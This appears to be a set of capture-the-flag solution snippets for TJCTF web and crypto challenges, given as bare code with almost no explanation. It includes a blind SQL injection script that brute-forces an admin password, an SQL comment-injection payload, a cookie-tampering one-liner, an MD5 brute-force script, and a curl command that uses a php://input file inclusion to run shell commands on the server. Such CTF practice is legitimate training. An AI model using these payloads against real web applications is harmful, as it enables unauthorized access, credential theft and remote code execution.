echo 'COOKIE' | sed 's/false/true/g' | base64 -w0

speed = int(hashlib.md5(("Horse_" + horse).encode()).hexdigest(), 16)

from pwn import *
import hashlib
from pwnlib.util.iters import mbruteforce
import string

BOSS_HORSE = "MechaOmkar-YG6BPRJM"
goal = int(hashlib.md5(("Horse_" + BOSS_HORSE).encode()).hexdigest(), 16)
def attempt(horse):
        speed = int(hashlib.md5(("Horse_" + horse).encode()).hexdigest(), 16)
        if speed > goal:
                return True
        else:
                return False
myhorse = mbruteforce(attempt, string.ascii_lowercase, length=10)
print(myhorse)

import requests

url = 'https://weak_password.tjctf.org/login'
alphabet = 'abcdefghijklmnopqrstuvwxyz'

print('Bruteforcing password: ', end='', flush=True)
for i in range(100):
    for char in alphabet:
        r = requests.post(url, data = {'username': 'test', 'password': f"a' OR EXISTS(SELECT * FROM `userandpassword` WHERE username='admin' AND password LIKE '{'_'*i}{char}%') AND ''='"})
        if 'Wrong' not in r.text:
            print(char, end='', flush=True)
            break
    else:
        print('\nPassword found')

"SELECT username, password FROM `userandpassword` WHERE username='admin/*' AND password='<md5 HASH object @ 0x00000151246A95F8>'"
/* is a comment so everything after that is ignored.

-r--r--r-- 1 root     root       44 May 18 15:32 apple.txt
-r--r--r-- 1 root     root       74 May 24 15:12 grape.txt
dr-xr-xr-x 1 root     root     4096 May 24 15:12 i_wonder_whats_in_here
-r--r--r-- 1 root     root     3012 May 18 15:32 index.html
-r--r--r-- 1 root     root       27 May 18 15:32 orange.txt
-r--r--r-- 1 root     root       49 May 18 15:32 pear.txt
-r--r--r-- 1 root     root       27 May 18 15:32 pinneaple.txt
-r--r--r-- 1 root     root     2532 May 18 15:32 reader.php
-r--r--r-- 1 root     root       22 May 18 15:32 watermelon.txt

curl -XPOST 'https://file_viewer.tjctf.org/reader.php?file=php://input' -d '<?php system("cat i_wonder_whats_in_here/* "); ?>'